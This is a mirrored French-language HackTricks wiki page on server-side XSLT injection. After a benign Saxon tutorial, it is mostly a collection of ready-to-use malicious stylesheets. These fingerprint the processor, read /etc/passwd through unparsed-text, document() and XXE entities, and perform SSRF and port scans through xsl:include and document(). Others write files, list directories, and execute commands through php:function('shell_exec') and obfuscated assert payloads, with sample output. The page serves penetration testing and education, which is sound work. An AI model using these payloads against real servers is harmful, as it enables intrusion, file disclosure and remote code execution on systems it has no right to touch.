mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-30 08:30:57 +00:00
416 lines
16 KiB
Markdown
416 lines
16 KiB
Markdown
# Injection côté serveur XSLT (Transformations de langage de feuille de style extensible)
|
||
|
||
<details>
|
||
|
||
<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Expert de l'équipe rouge AWS de HackTricks)</strong></a><strong>!</strong></summary>
|
||
|
||
* Travaillez-vous dans une **entreprise de cybersécurité**? Voulez-vous voir votre **entreprise annoncée dans HackTricks**? ou voulez-vous avoir accès à la **dernière version du PEASS ou télécharger HackTricks en PDF**? Consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)!
|
||
* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
|
||
* **Rejoignez le** [**💬**](https://emojipedia.org/speech-balloon/) [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez** moi sur **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||
* **Partagez vos astuces de piratage en soumettant des PR au [dépôt hacktricks](https://github.com/carlospolop/hacktricks) et [dépôt hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
|
||
|
||
</details>
|
||
|
||
## Informations de base
|
||
|
||
XSLT est une technologie utilisée pour transformer des documents XML en différents formats. Il existe trois versions : 1, 2 et 3, la version 1 étant la plus couramment utilisée. Le processus de transformation peut être exécuté soit côté serveur, soit dans le navigateur.
|
||
|
||
Les frameworks les plus fréquemment utilisés comprennent :
|
||
|
||
- **Libxslt** de Gnome,
|
||
- **Xalan** d'Apache,
|
||
- **Saxon** de Saxonica.
|
||
|
||
Pour l'exploitation des vulnérabilités associées à XSLT, il est nécessaire que des balises xsl soient stockées côté serveur, suivies de l'accès à ce contenu. Une illustration d'une telle vulnérabilité est documentée dans la source suivante : [https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/](https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/).
|
||
|
||
## Exemple - Tutoriel
|
||
```bash
|
||
sudo apt-get install default-jdk
|
||
sudo apt-get install libsaxonb-java libsaxon-java
|
||
```
|
||
{% code title="xml.xml" %}
|
||
```xml
|
||
<?xml version="1.0" encoding="UTF-8"?>
|
||
<catalog>
|
||
<cd>
|
||
<title>CD Title</title>
|
||
<artist>The artist</artist>
|
||
<company>Da Company</company>
|
||
<price>10000</price>
|
||
<year>1760</year>
|
||
</cd>
|
||
</catalog>
|
||
```
|
||
{% endcode %}
|
||
|
||
{% code title="xsl.xsl" %}
|
||
```xml
|
||
<?xml version="1.0" encoding="UTF-8"?>
|
||
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
|
||
<xsl:template match="/">
|
||
<html>
|
||
<body>
|
||
<h2>The Super title</h2>
|
||
<table border="1">
|
||
<tr bgcolor="#9acd32">
|
||
<th>Title</th>
|
||
<th>artist</th>
|
||
</tr>
|
||
<tr>
|
||
<td><xsl:value-of select="catalog/cd/title"/></td>
|
||
<td><xsl:value-of select="catalog/cd/artist"/></td>
|
||
</tr>
|
||
</table>
|
||
</body>
|
||
</html>
|
||
</xsl:template>
|
||
</xsl:stylesheet>
|
||
```
|
||
{% endcode %}
|
||
|
||
Exécuter:
|
||
```xml
|
||
saxonb-xslt -xsl:xsl.xsl xml.xml
|
||
|
||
Warning: at xsl:stylesheet on line 2 column 80 of xsl.xsl:
|
||
Running an XSLT 1.0 stylesheet with an XSLT 2.0 processor
|
||
<html>
|
||
<body>
|
||
<h2>The Super title</h2>
|
||
<table border="1">
|
||
<tr bgcolor="#9acd32">
|
||
<th>Title</th>
|
||
<th>artist</th>
|
||
</tr>
|
||
<tr>
|
||
<td>CD Title</td>
|
||
<td>The artist</td>
|
||
</tr>
|
||
</table>
|
||
</body>
|
||
</html>
|
||
```
|
||
### Empreinte digitale
|
||
|
||
{% code title="detection.xsl" %}
|
||
```xml
|
||
<?xml version="1.0" encoding="ISO-8859-1"?>
|
||
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
|
||
<xsl:template match="/">
|
||
Version: <xsl:value-of select="system-property('xsl:version')" /><br />
|
||
Vendor: <xsl:value-of select="system-property('xsl:vendor')" /><br />
|
||
Vendor URL: <xsl:value-of select="system-property('xsl:vendor-url')" /><br />
|
||
<xsl:if test="system-property('xsl:product-name')">
|
||
Product Name: <xsl:value-of select="system-property('xsl:product-name')" /><br />
|
||
</xsl:if>
|
||
<xsl:if test="system-property('xsl:product-version')">
|
||
Product Version: <xsl:value-of select="system-property('xsl:product-version')" /><br />
|
||
</xsl:if>
|
||
<xsl:if test="system-property('xsl:is-schema-aware')">
|
||
Is Schema Aware ?: <xsl:value-of select="system-property('xsl:is-schema-aware')" /><br />
|
||
</xsl:if>
|
||
<xsl:if test="system-property('xsl:supports-serialization')">
|
||
Supports Serialization: <xsl:value-of select="system-property('xsl:supportsserialization')"
|
||
/><br />
|
||
</xsl:if>
|
||
<xsl:if test="system-property('xsl:supports-backwards-compatibility')">
|
||
Supports Backwards Compatibility: <xsl:value-of select="system-property('xsl:supportsbackwards-compatibility')"
|
||
/><br />
|
||
</xsl:if>
|
||
</xsl:template>
|
||
</xsl:stylesheet>
|
||
```
|
||
{% endcode %}
|
||
|
||
Et exécuter
|
||
```xml
|
||
$saxonb-xslt -xsl:detection.xsl xml.xml
|
||
|
||
Warning: at xsl:stylesheet on line 2 column 80 of detection.xsl:
|
||
Running an XSLT 1.0 stylesheet with an XSLT 2.0 processor
|
||
<h2>XSLT identification</h2><b>Version:</b>2.0<br><b>Vendor:</b>SAXON 9.1.0.8 from Saxonica<br><b>Vendor URL:</b>http://www.saxonica.com/<br>
|
||
```
|
||
### Lire un fichier local
|
||
|
||
{% code title="read.xsl" %}
|
||
```xml
|
||
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:abc="http://php.net/xsl" version="1.0">
|
||
<xsl:template match="/">
|
||
<xsl:value-of select="unparsed-text('/etc/passwd', 'utf-8')"/>
|
||
</xsl:template>
|
||
</xsl:stylesheet>
|
||
```
|
||
{% endcode %}
|
||
```xml
|
||
$ saxonb-xslt -xsl:read.xsl xml.xml
|
||
|
||
Warning: at xsl:stylesheet on line 1 column 111 of read.xsl:
|
||
Running an XSLT 1.0 stylesheet with an XSLT 2.0 processor
|
||
<?xml version="1.0" encoding="UTF-8"?>root:x:0:0:root:/root:/bin/bash
|
||
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
|
||
bin:x:2:2:bin:/bin:/usr/sbin/nologin
|
||
sys:x:3:3:sys:/dev:/usr/sbin/nologin
|
||
sync:x:4:65534:sync:/bin:/bin/sync
|
||
games:x:5:60:games:/usr/games:/usr/sbin/nologin
|
||
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
|
||
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
|
||
```
|
||
### SSRF
|
||
|
||
SSRF (Server-Side Request Forgery) is a vulnerability that allows an attacker to manipulate the server into making requests on their behalf.
|
||
```xml
|
||
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:abc="http://php.net/xsl" version="1.0">
|
||
<xsl:include href="http://127.0.0.1:8000/xslt"/>
|
||
<xsl:template match="/">
|
||
</xsl:template>
|
||
</xsl:stylesheet>
|
||
```
|
||
### Versions
|
||
|
||
Il pourrait y avoir plus ou moins de fonctions en fonction de la version XSLT utilisée :
|
||
|
||
* [https://www.w3.org/TR/xslt-10/](https://www.w3.org/TR/xslt-10/)
|
||
* [https://www.w3.org/TR/xslt20/](https://www.w3.org/TR/xslt20/)
|
||
* [https://www.w3.org/TR/xslt-30/](https://www.w3.org/TR/xslt-30/)
|
||
|
||
## Fingerprint
|
||
|
||
Téléchargez ceci et obtenez des informations
|
||
```xml
|
||
<?xml version="1.0" encoding="ISO-8859-1"?>
|
||
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
|
||
<xsl:template match="/">
|
||
Version: <xsl:value-of select="system-property('xsl:version')" /><br />
|
||
Vendor: <xsl:value-of select="system-property('xsl:vendor')" /><br />
|
||
Vendor URL: <xsl:value-of select="system-property('xsl:vendor-url')" /><br />
|
||
<xsl:if test="system-property('xsl:product-name')">
|
||
Product Name: <xsl:value-of select="system-property('xsl:product-name')" /><br />
|
||
</xsl:if>
|
||
<xsl:if test="system-property('xsl:product-version')">
|
||
Product Version: <xsl:value-of select="system-property('xsl:product-version')" /><br />
|
||
</xsl:if>
|
||
<xsl:if test="system-property('xsl:is-schema-aware')">
|
||
Is Schema Aware ?: <xsl:value-of select="system-property('xsl:is-schema-aware')" /><br />
|
||
</xsl:if>
|
||
<xsl:if test="system-property('xsl:supports-serialization')">
|
||
Supports Serialization: <xsl:value-of select="system-property('xsl:supportsserialization')"
|
||
/><br />
|
||
</xsl:if>
|
||
<xsl:if test="system-property('xsl:supports-backwards-compatibility')">
|
||
Supports Backwards Compatibility: <xsl:value-of select="system-property('xsl:supportsbackwards-compatibility')"
|
||
/><br />
|
||
</xsl:if>
|
||
</xsl:template>
|
||
</xsl:stylesheet>
|
||
```
|
||
## SSRF
|
||
|
||
## SSRF
|
||
```xml
|
||
<esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl">
|
||
</esi:include>
|
||
```
|
||
## Injection de Javascript
|
||
```xml
|
||
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
|
||
<xsl:template match="/">
|
||
<script>confirm("We're good");</script>
|
||
</xsl:template>
|
||
</xsl:stylesheet>
|
||
```
|
||
## Listing de répertoire (PHP)
|
||
|
||
### **Opendir + readdir**
|
||
```xml
|
||
<?xml version="1.0" encoding="utf-8"?>
|
||
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl" >
|
||
<xsl:template match="/">
|
||
<xsl:value-of select="php:function('opendir','/path/to/dir')"/>
|
||
<xsl:value-of select="php:function('readdir')"/> -
|
||
<xsl:value-of select="php:function('readdir')"/> -
|
||
<xsl:value-of select="php:function('readdir')"/> -
|
||
<xsl:value-of select="php:function('readdir')"/> -
|
||
<xsl:value-of select="php:function('readdir')"/> -
|
||
<xsl:value-of select="php:function('readdir')"/> -
|
||
<xsl:value-of select="php:function('readdir')"/> -
|
||
<xsl:value-of select="php:function('readdir')"/> -
|
||
<xsl:value-of select="php:function('readdir')"/> -
|
||
</xsl:template></xsl:stylesheet>
|
||
```
|
||
### **Affirmer (var_dump + scandir + false)**
|
||
```xml
|
||
<?xml version="1.0" encoding="UTF-8"?>
|
||
<html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
|
||
<body style="font-family:Arial;font-size:12pt;background-color:#EEEEEE">
|
||
<xsl:copy-of name="asd" select="php:function('assert','var_dump(scandir(chr(46).chr(47)))==3')" />
|
||
<br />
|
||
</body>
|
||
</html>
|
||
```
|
||
## Lire les fichiers
|
||
|
||
### **Interne - PHP**
|
||
```xml
|
||
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:abc="http://php.net/xsl" version="1.0">
|
||
<xsl:template match="/">
|
||
<xsl:value-of select="unparsed-text('/etc/passwd', ‘utf-8')"/>
|
||
</xsl:template>
|
||
</xsl:stylesheet>
|
||
```
|
||
### **Interne - XXE**
|
||
```xml
|
||
<?xml version="1.0" encoding="utf-8"?>
|
||
<!DOCTYPE dtd_sample[<!ENTITY ext_file SYSTEM "/etc/passwd">]>
|
||
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
|
||
<xsl:template match="/">
|
||
&ext_file;
|
||
</xsl:template>
|
||
</xsl:stylesheet>
|
||
```
|
||
### **À travers HTTP**
|
||
```xml
|
||
<?xml version="1.0" encoding="utf-8"?>
|
||
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
|
||
<xsl:template match="/">
|
||
<xsl:value-of select="document('/etc/passwd')"/>
|
||
</xsl:template>
|
||
</xsl:stylesheet>
|
||
```
|
||
|
||
```xml
|
||
<!DOCTYPE xsl:stylesheet [
|
||
<!ENTITY passwd SYSTEM "file:///etc/passwd" >]>
|
||
<xsl:template match="/">
|
||
&passwd;
|
||
</xsl:template>
|
||
```
|
||
### **Interne (fonction PHP)**
|
||
```xml
|
||
<?xml version="1.0" encoding="utf-8"?>
|
||
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl" >
|
||
<xsl:template match="/">
|
||
<xsl:value-of select="php:function('file_get_contents','/path/to/file')"/>
|
||
</xsl:template>
|
||
</xsl:stylesheet>
|
||
```
|
||
|
||
```xml
|
||
<?xml version="1.0" encoding="UTF-8"?>
|
||
<html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
|
||
<body style="font-family:Arial;font-size:12pt;background-color:#EEEEEE">
|
||
<xsl:copy-of name="asd" select="php:function('assert','var_dump(file_get_contents(scandir(chr(46).chr(47))[2].chr(47).chr(46).chr(112).chr(97).chr(115).chr(115).chr(119).chr(100)))==3')" />
|
||
<br />
|
||
</body>
|
||
</html>
|
||
```
|
||
### Analyse de port
|
||
```xml
|
||
<?xml version="1.0" encoding="utf-8"?>
|
||
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl" >
|
||
<xsl:template match="/">
|
||
<xsl:value-of select="document('http://example.com:22')"/>
|
||
</xsl:template>
|
||
</xsl:stylesheet>
|
||
```
|
||
## Écrire dans un fichier
|
||
|
||
### XSLT 2.0
|
||
```xml
|
||
<?xml version="1.0" encoding="utf-8"?>
|
||
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl" >
|
||
<xsl:template match="/">
|
||
<xsl:result-document href="local_file.txt">
|
||
<xsl:text>Write Local File</xsl:text>
|
||
</xsl:result-document>
|
||
</xsl:template>
|
||
</xsl:stylesheet>
|
||
```
|
||
### **Extension Xalan-J**
|
||
```xml
|
||
<xsl:template match="/">
|
||
<redirect:open file="local_file.txt"/>
|
||
<redirect:write file="local_file.txt"/> Write Local File</redirect:write>
|
||
<redirect:close file="loxal_file.txt"/>
|
||
</xsl:template>
|
||
```
|
||
## Inclure des fichiers externes XSL
|
||
```xml
|
||
<xsl:include href="http://extenal.web/external.xsl"/>
|
||
```
|
||
|
||
```xml
|
||
<?xml version="1.0" ?>
|
||
<?xml-stylesheet type="text/xsl" href="http://external.web/ext.xsl"?>
|
||
```
|
||
## Exécuter du code
|
||
|
||
### **php:function**
|
||
```xml
|
||
<?xml version="1.0" encoding="utf-8"?>
|
||
<xsl:stylesheet version="1.0"
|
||
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
|
||
xmlns:php="http://php.net/xsl" >
|
||
<xsl:template match="/">
|
||
<xsl:value-of select="php:function('shell_exec','sleep 10')" />
|
||
</xsl:template>
|
||
</xsl:stylesheet>
|
||
```
|
||
|
||
```xml
|
||
<?xml version="1.0" encoding="UTF-8"?>
|
||
<html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
|
||
<body style="font-family:Arial;font-size:12pt;background-color:#EEEEEE">
|
||
<xsl:copy-of name="asd" select="php:function('assert','var_dump(scandir(chr(46).chr(47)));')" />
|
||
<br />
|
||
</body>
|
||
</html>
|
||
```
|
||
### **Exécuter du code en utilisant d'autres frameworks dans le PDF**
|
||
|
||
**Langues supplémentaires**
|
||
|
||
**Sur cette page, vous pouvez trouver des exemples de RCE dans d'autres langages :** [**https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt\_injection#C%23%2FVB.NET%2FASP.NET**](https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt\_injection#C%23%2FVB.NET%2FASP.NET) **(C#, Java, PHP)**
|
||
|
||
## **Accéder aux fonctions statiques PHP des classes**
|
||
|
||
La fonction suivante appellera la méthode statique `stringToUrl` de la classe XSL :
|
||
```xml
|
||
<!--- More complex test to call php class function-->
|
||
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl"
|
||
version="1.0">
|
||
<xsl:output method="html" version="XHTML 1.0" encoding="UTF-8" indent="yes" />
|
||
<xsl:template match="root">
|
||
<html>
|
||
<!-- We use the php suffix to call the static class function stringToUrl() -->
|
||
<xsl:value-of select="php:function('XSL::stringToUrl','une_superstring-àÔ|modifier')" />
|
||
<!-- Output: 'une_superstring ao modifier' -->
|
||
</html>
|
||
</xsl:template>
|
||
</xsl:stylesheet>
|
||
```
|
||
## Plus de Payloads
|
||
* Vérifiez [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSLT%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSLT%20Injection)
|
||
* Vérifiez [https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt_injection](https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt_injection)
|
||
|
||
## **Liste de détection par force brute**
|
||
|
||
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/xslt.txt" %}
|
||
|
||
## **Références**
|
||
|
||
* [XSLT\_SSRF](https://feelsec.info/wp-content/uploads/2018/11/XSLT\_SSRF.pdf)\\
|
||
* [http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Abusing%20XSLT%20for%20practical%20attacks%20-%20Arnaboldi%20-%20IO%20Active.pdf](http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Abusing%20XSLT%20for%20practical%20attacks%20-%20Arnaboldi%20-%20IO%20Active.pdf)\\
|
||
* [http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Abusing%20XSLT%20for%20practical%20attacks%20-%20Arnaboldi%20-%20Blackhat%202015.pdf](http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Abusing%20XSLT%20for%20practical%20attacks%20-%20Arnaboldi%20-%20Blackhat%202015.pdf)
|
||
|
||
<details>
|
||
|
||
<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||
|
||
* Travaillez-vous dans une **entreprise de cybersécurité**? Voulez-vous voir votre **entreprise annoncée dans HackTricks**? ou voulez-vous avoir accès à la **dernière version du PEASS ou télécharger HackTricks en PDF**? Consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)!
|
||
* Découvrez [**The PEASS Family**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
|
||
* **Rejoignez le** [**💬**](https://emojipedia.org/speech-balloon/) [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez** moi sur **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||
* **Partagez vos astuces de piratage en soumettant des PR au [dépôt hacktricks](https://github.com/carlospolop/hacktricks) et [dépôt hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
|
||
|
||
</details>
|